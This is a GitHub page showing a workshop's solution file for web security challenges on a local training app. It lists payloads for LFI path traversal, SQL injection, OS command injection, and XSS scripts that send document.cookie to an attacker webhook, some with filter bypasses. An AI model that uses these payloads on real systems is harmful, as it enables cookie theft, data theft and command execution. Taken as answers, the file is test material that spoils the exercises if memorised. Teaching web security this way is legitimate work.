Skip to content

Latest commit

 

History

History
39 lines (27 loc) · 706 Bytes

Solution.md

File metadata and controls

39 lines (27 loc) · 706 Bytes

Web Security Workshop solutions

LFI: exporting data on inspector gadget

Visit http://localhost:3001/?loc=..%2f..%2fdocument%2finsp3ct0r_g4dg3t_456afbc.ht.htmlml

SQLI: Worker's Union

Query: ' UNION SELECT flag, null FROM flags;--

XSS: Basic

<script>
  document.location.href = "<Your webhook site>?c=" + document.cookie;
</script>

OS Command injection: Safe-Cmd

;cat<flag.txt;#

XSS: Getting the staff cookies

<script>
  document.location.href = "<Your webhook site>?c=" + document.cookie;
</script>

XSS: Getting the admin

<scr<script>ipt>
document.location.href= "<Your webhook site>?c=" + document.cookie;
</scr</script>ipt>